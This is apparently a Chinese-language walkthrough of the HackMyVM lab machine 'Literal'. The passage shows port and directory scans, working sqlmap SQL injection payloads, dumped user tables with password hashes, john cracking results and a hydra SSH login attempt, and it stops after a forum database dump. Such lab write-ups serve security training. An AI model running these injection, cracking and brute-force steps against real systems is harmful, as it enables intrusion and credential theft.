Literal
Literal
信息搜集
端口扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/temp/literal]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned my computer so many times, it thinks we're dating.
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.107:22
Open 192.168.10.107:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 30:ca:55:94:68:33:8b:50:42:f4:c2:b5:13:99:66:fe (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHo8DOQOkmGeRiMEbdmfaE+IyUTZlYHdLzXeFISi7bsWEPHm2f3Lx9RpCBM4g05tmpBBe4sPyruVbuslcGcCmlUzBYupaHJQRVi79Dezh9CKf4Ui1EC6y4jh9TbvHPvM7hPhSBhADnCuEpWlVHeyUs4Wwzt6149l4ZFYXnl1/jfG/LA/PNRX26fhZUEJJXuvhwJIbchRxXhF00mREtmx5hbyDAXOIImUReCSjEhUAR3I4eljBgNEf/SoBvntnricNXGb8y2M1WoidBz3lLRRPhpQy0GE2BVs/05EirzRAIVWhLj7OiKIoLRd/tKq/CvSy5AYPyaC55cwktS60KIMzUBldGK65btKjNabs9rgNE/azTmpmEiWuHZKCdW4IhA00hXywbr6lWuSNmEaPnQqBLT0VUKFHEyhApBmvcT5GjHS34lG88xGAy7V1TVW8JKPHDq1ttnnJknRn9C9BmgylrwyL7m8UjCn49unSIbIFtkaSshPhpZfLzxxXKS6xrBes=
| 256 2d:b0:5e:6b:96:bd:0b:e3:14:fb:e0:d0:58:84:50:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNvQ4n2nkgCsY7Z8qPbOt54NyXbow2ioVHPFXTn6XuwDOJpc5Q0FhEmSTVC4o4l9G+FMDzkJ2JgghkHvNstXiXU=
| 256 92:d9:2a:5d:6f:58:db:85:56:d6:0c:99:68:b8:59:64 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKUnTxK9t2cdkLjqE75NTSfr7qidWHqt0/uV3i0UALED
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://blog.literal.hmv
MAC Address: 08:00:27:4C:64:E1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: blog.literal.hmv; OS: Linux; CPE: cpe:/o:linux:linux_kernel
得到了一个域名解析,添加到/etc/hosts:
1
192.168.10.107 blog.literal.hmv
目录扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/temp/literal]
└─$ gobuster dir -u http://blog.literal.hmv/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,zip -e 200,302,301 -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://blog.literal.hmv/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,zip,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://blog.literal.hmv/.html (Status: 403) [Size: 281]
http://blog.literal.hmv/.php (Status: 403) [Size: 281]
http://blog.literal.hmv/images (Status: 301) [Size: 321] [--> http://blog.literal.hmv/images/]
http://blog.literal.hmv/index.html (Status: 200) [Size: 3325]
http://blog.literal.hmv/login.php (Status: 200) [Size: 1893]
http://blog.literal.hmv/register.php (Status: 200) [Size: 2159]
http://blog.literal.hmv/logout.php (Status: 302) [Size: 0] [--> login.php]
http://blog.literal.hmv/config.php (Status: 200) [Size: 0]
http://blog.literal.hmv/fonts (Status: 301) [Size: 320] [--> http://blog.literal.hmv/fonts/]
http://blog.literal.hmv/dashboard.php (Status: 302) [Size: 0] [--> login.php]
http://blog.literal.hmv/.html (Status: 403) [Size: 281]
http://blog.literal.hmv/.php (Status: 403) [Size: 281]
http://blog.literal.hmv/server-status (Status: 403) [Size: 281]
Progress: 1102800 / 1102805 (100.00%)
===============================================================
Finished
===============================================================
漏洞发现
踩点
尝试login.php以及register.php:
尝试创建一个用户并进行登录:
登录以后:
sql注入
看起来是一个数据库,尝试是否存在SQL注入,不知道为啥访问速递极慢且卡顿,尝试命令行进行查询:
1
PHPSESSID=1q4tie68cpa1mue9af2ao65549
尝试进行sqlmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch --dbs
___
__H__
___ ___[.]_____ ___ ___ {1.9.2#stable}
|_ -| . [,] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:04:49 /2025-06-08/
[12:04:49] [INFO] resuming back-end DBMS 'mysql'
[12:04:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: sentence-query (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: sentence-query=1' AND (SELECT 3428 FROM (SELECT(SLEEP(5)))hFKD) AND 'mdnY'='mdnY
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: sentence-query=1' UNION ALL SELECT NULL,CONCAT(0x717a6b7871,0x4b756f5a616d456b4c76596f48446652644149766b6d64745666776148746858744863505247566e,0x716b626a71),NULL,NULL,NULL-- -
---
[12:04:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[12:04:49] [INFO] fetching database names
available databases [4]:
[*] blog
[*] information_schema
[*] mysql
[*] performance_schema
[12:04:50] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/blog.literal.hmv'
┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog --tables
-----
Database: blog
[2 tables]
+----------+
| projects |
| users |
+----------+
┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog -T users --dump
Database: blog
Table: users
[18 entries]
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+
| userid | username | useremail | userpassword | usercreatedate |
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+
| 1 | test | test@blog.literal.htb | $2y$10$wWhvCz1pGsKm..jh/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma | 2023-04-07 17:21:47 |
| 2 | admin | admin@blog.literal.htb | $2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K | 2023-04-07 17:21:47 |
| 3 | carlos | carlos@blog.literal.htb | $2y$10$ikI1dN/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD/.p.bh0w.bJBW | 2023-04-07 17:21:48 |
| 4 | freddy123 | freddy123@zeeli.moc | $2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK | 2023-04-07 17:21:48 |
| 5 | jorg3_M | jorg3_M@zeeli.moc | $2y$10$lZ./Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG | 2023-04-07 17:21:48 |
| 6 | aNdr3s1to | aNdr3s1to@puertonacional.ply | $2y$10$F2Eh43xkXR/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi/OBA6hm | 2023-04-07 17:21:48 |
| 7 | kitty | kitty@estadodelarte.moc | $2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW | 2023-04-07 17:21:48 |
| 8 | walter | walter@forumtesting.literal.hmv | $2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO | 2023-04-07 17:21:48 |
| 9 | estefy | estefy@caselogic.moc | $2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa | 2023-04-07 17:21:48 |
| 10 | michael | michael@without.you | $2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km | 2023-04-07 17:21:48 |
| 11 | r1ch4rd | r1ch4rd@forumtesting.literal.hmv | $2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO | 2023-04-07 17:21:48 |
| 12 | fel1x | fel1x@without.you | $2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m | 2023-04-07 17:21:48 |
| 13 | kelsey | kelsey@without.you | $2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6. | 2023-04-07 17:21:48 |
| 14 | jtx | jtx@tiempoaltiempo.hy | $2y$10$jN5dt8syJ5cVrlpotOXibeNC/jvW0bn3z6FetbVU/CeFtKwhdhslC | 2023-04-07 17:21:48 |
| 15 | DRphil | DRphil@alcaldia-tol.gob | $2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC | 2023-04-07 17:21:48 |
| 16 | carm3N | carm3N@estadodelarte.moc | $2y$10$D7uF6dKbRfv8U/M/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo/.RnW | 2023-04-07 17:21:48 |
| 17 | lanz | lanz@literal.htb | $2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So/8IWLi4e69QqJrM8FZvAMf..e | 2023-04-07 17:55:36 |
| 18 | kali | kali@kali.com | $2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1. | 2025-06-08 15:40:11 |
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+
这里准备破译,直接丢给ai让他分离再给我们就行了。。。。(高端的厨师往往采用最朴素的烹饪方式)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
test:$2y$10$wWhvCz1pGsKm..jh/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma
admin:$2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K
carols:$2y$10$ikI1dN/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD/.p.bh0w.bJBW
freddy123:$2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK
jorg3_M:$2y$10$lZ./Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG
aNdr3s1to:$2y$10$F2Eh43xkXR/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi/OBA6hm
kitty:$2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW
walter:$2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO
estefy:$2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa
michael:$2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km
r1ch4rd:$2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO
fel1x:$2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m
kelsey:$2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6.
jtx:$2y$10$jN5dt8syJ5cVrlpotOXibeNC/jvW0bn3z6FetbVU/CeFtKwhdhslC
DRphil:$2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC
carm3N:$2y$10$D7uF6dKbRfv8U/M/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo/.RnW
lanz:$2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So/8IWLi4e69QqJrM8FZvAMf..e
kali:$2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1.
尝试进行破译:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/temp/literal]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 18 password hashes with 18 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456789 (freddy123)
butterfly (estefy)
monica (r1ch4rd)
hellokitty (kitty)
50cent (DRphil)
slipknot (jorg3_M)
michael1 (michael)
147258369 (fel1x)
kelsey (kelsey)
741852963 (walter)
zxcvbnm,./ (jtx)
记录一下密码,并尝试进行ssh连接。这里用 AI 编写了一个脚本尝试进行核对:
1
2
3
4
5
6
7
8
9
10
11
12
# user
freddy123
estefy
r1ch4rd
kitty
DRphil
jorg3_M
michael
fel1x
kelsey
walter
jtx
1
2
3
4
5
6
7
8
9
10
11
12
# pass
123456789
butterfly
monica
hellokitty
50cent
slipknot
michael1
147258369
kelsey
741852963
zxcvbnm,./
尝试爆破但是失败了:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
┌──(kali㉿kali)-[~/temp/literal]
└─$ paste -d: user pass > cred
┌──(kali㉿kali)-[~/temp/literal]
└─$ hydra -C cred ssh://192.168.10.107:22 -t 4 -vV -f
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-08 12:42:58
[DATA] max 4 tasks per 1 server, overall 4 tasks, 11 login tries, ~3 tries per task
[DATA] attacking ssh://192.168.10.107:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://freddy123@192.168.10.107:22
[INFO] Successful, password authentication is supported by ssh://192.168.10.107:22
[ATTEMPT] target 192.168.10.107 - login "freddy123" - pass "123456789" - 1 of 11 [child 0] (0/0)
[ATTEMPT] target 192.168.10.107 - login "estefy" - pass "butterfly" - 2 of 11 [child 1] (0/0)
[ATTEMPT] target 192.168.10.107 - login "r1ch4rd" - pass "monica" - 3 of 11 [child 2] (0/0)
[ATTEMPT] target 192.168.10.107 - login "kitty" - pass "hellokitty" - 4 of 11 [child 3] (0/0)
[ATTEMPT] target 192.168.10.107 - login "DRphil" - pass "50cent" - 5 of 11 [child 0] (0/0)
[ATTEMPT] target 192.168.10.107 - login "jorg3_M" - pass "slipknot" - 6 of 11 [child 1] (0/0)
[ATTEMPT] target 192.168.10.107 - login "michael" - pass "michael1" - 7 of 11 [child 3] (0/0)
[ATTEMPT] target 192.168.10.107 - login "fel1x" - pass "147258369" - 8 of 11 [child 2] (0/0)
[ATTEMPT] target 192.168.10.107 - login "kelsey" - pass "kelsey" - 9 of 11 [child 3] (0/0)
[ATTEMPT] target 192.168.10.107 - login "walter" - pass "741852963" - 10 of 11 [child 1] (0/0)
[ATTEMPT] target 192.168.10.107 - login "jtx" - pass "zxcvbnm,./" - 11 of 11 [child 0] (0/0)
[STATUS] attack finished for 192.168.10.107 (waiting for children to complete tests)
1 of 1 target completed, 0 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-08 12:43:07
新注入点
注意到前面的邮箱中出现了一个新的dns解析,尝试进行利用:
1
192.168.10.107 forumtesting.literal.hmv
尝试访问,发现会自动进行跳转:
1
http://forumtesting.literal.hmv/category.php
反馈太慢,总是卡死,尝试终端进行测试吧:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
┌──(kali㉿kali)-[~/temp/literal]
└─$ curl http://forumtesting.literal.hmv/category.php
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap-theme.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<!-- jQuery -->
<title>c4TLoUis forum</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
<link rel="stylesheet" href="css/style.css">
</head>
<body class="">
<div class="container" style="min-height:500px;">
<div class="container">
<div class="row">
<h2>Discussion Forum | About... Imagination</h2>
<h3><a href="category.php">Home</a> | <a href="login.php">Login</a> | <a href="cp_login.php">Control Panel</a></h3>
<div class="single category">
<ul class="list-unstyled">
<li><span style="font-size:25px;font-weight:bold;">Categories</span> <span class="pull-right"><span style="font-size:20px;font-weight:bold;">Topics / Posts</span></span></li>
<li><a href="category.php?category_id=2" title="">Forum details <span class="pull-right">0 / 0</span></a></li>
<li><a href="category.php?category_id=1" title="">New things for the blog <span class="pull-right">0 / 0</span></a></li>
</ul>
</div>
</div>
</div>
<div class="insert-post-ads1" style="margin-top:20px;">
</body>
</html>
┌──(kali㉿kali)-[~/temp/literal]
└─$ curl http://forumtesting.literal.hmv/category.php | html2text
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1816 100 1816 0 0 24319 0 --:--:-- --:--:-- --:--:-- 24540
***** Discussion Forum | About... Imagination *****
**** Home | Login | Control Panel ****
* Categories Topics / Posts
* Forum details 0 / 0
* New things for the blog 0 / 0
┌──(kali㉿kali)-[~/temp/literal]
└─$ curl -s http://forumtesting.literal.hmv/category.php | html2text
***** Discussion Forum | About... Imagination *****
**** Home | Login | Control Panel ****
* Categories Topics / Posts
* Forum details 0 / 0
* New things for the blog 0 / 0
发现出现了可能存在sql注入的点:category.php?category_id=2,进行sqlmap测试:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch --dbs
___
__H__
___ ___[']_____ ___ ___ {1.9.2#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:55:58 /2025-06-08/
[12:55:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=82oqekh0oed...3bdp26e439'). Do you want to use those [Y/n] Y
[12:55:58] [INFO] testing if the target URL content is stable
[12:55:58] [INFO] target URL content is stable
[12:55:58] [INFO] testing if GET parameter 'category_id' is dynamic
[12:55:58] [INFO] GET parameter 'category_id' appears to be dynamic
[12:55:58] [WARNING] heuristic (basic) test shows that GET parameter 'category_id' might not be injectable
[12:55:58] [INFO] testing for SQL injection on GET parameter 'category_id'
[12:55:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:55:59] [WARNING] reflective value(s) found and filtering out
[12:55:59] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:55:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:55:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:55:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[12:55:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:55:59] [INFO] testing 'Generic inline queries'
[12:55:59] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:55:59] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:55:59] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:55:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:56:19] [INFO] GET parameter 'category_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:56:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:56:19] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:56:19] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:56:19] [INFO] target URL appears to have 1 column in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
[12:56:19] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[12:56:19] [INFO] target URL appears to be UNION injectable with 1 columns
[12:56:19] [INFO] checking if the injection point on GET parameter 'category_id' is a false positive
GET parameter 'category_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 94 HTTP(s) requests:
---
Parameter: category_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category_id=2 AND (SELECT 9058 FROM (SELECT(SLEEP(5)))OMno)
---
[12:56:59] [INFO] the back-end DBMS is MySQL
[12:56:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.12
[12:57:00] [INFO] fetching database names
[12:57:00] [INFO] fetching number of databases
[12:57:00] [INFO] retrieved:
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[12:57:30] [INFO] adjusting time delay to 1 second due to good response times
3
[12:57:30] [INFO] retrieved: in^C
[12:57:45] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 72 times
发现存在延时注入漏洞,看来这个靶机是训练sql注入的,可惜了,回头补回来吧。。。太慢了,经过漫长的测试拿到了一个凭证:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
# sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch --dbs
# information_schema
# performance_schema
# forumtesting
# sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch -D forumtesting --tables
# forum_category
# forum_owner
# forum_posts
# forum_topics
# forum_users
┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://forumtesting.literal.hmv/category.php?category_id=2" --batch -D forumtesting -T forum_owner --dump
___
__H__
___ ___["]_____ ___ ___ {1.9.2#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:24:22 /2025-06-08/
[13:24:22] [INFO] resuming back-end DBMS 'mysql'
[13:24:22] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=cldac0c27tr...9f43f8ihi7'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: category_id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: category_id=2 AND (SELECT 9058 FROM (SELECT(SLEEP(5)))OMno)
---
[13:24:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.12
[13:24:22] [INFO] fetching columns for table 'forum_owner' in database 'forumtesting'
[13:24:22] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[13:24:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
5
[13:24:43] [INFO] retrieved:
[13:24:53] [INFO] adjusting time delay to 1 second due to good response times
created
[13:25:27] [INFO] retrieved: email
[13:25:53] [INFO] retrieved: id
[13:26:06] [INFO] retrieved: password
[13:27:00] [INFO] retrieved: username
[13:27:45] [INFO] fetching entries for table 'forum_owner' in database 'forumtesting'
[13:27:45] [INFO] fetching number of entries for table 'forum_owner' in database 'forumtesting'
[13:27:45] [INFO] retrieved: 1
[13:27:47] [WARNING] reflective value(s) found and filtering out of statistical model, please wait
.............................. (done)
2022-02-12
[13:28:46] [INFO] retrieved: carlos@forumtesting.literal.htb
[13:32:11] [INFO] retrieved: 1
[13:32:16] [INFO] retrieved: 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99
[13:46:13] [INFO] retrieved: carlos
[13:46:49] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[13:46:49] [INFO] using hash method 'sha512_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[13:46:49] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[13:46:49] [INFO] starting dictionary-based cracking (sha512_generic_passwd)
[13:46:49] [INFO] starting 2 processes
[13:47:11] [WARNING] no clear password(s) found
Database: forumtesting
Table: forum_owner
[1 entry]
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+
| id | email | created | password | username |
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+
| 1 | carlos@forumtesting.literal.htb | 2022-02-12 | 6705fe62010679f04257358241792b41acba4ea896178a40eb63c743f5317a09faefa2e056486d55e9c05f851b222e6e7c5c1bd22af135157aa9b02201cf4e99 | carlos |
+----+---------------------------------+------------+----------------------------------------------------------------------------------------------------------------------------------+----------+
[13:47:11] [INFO] table 'forumtesting.forum_owner' dumped to CSV file '/home/kali/.local/share/sqlmap/output/forumtesting.literal.hmv/dump/forumtesting/forum_owner.csv'
[13:47:11] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/forumtesting.literal.hmv'
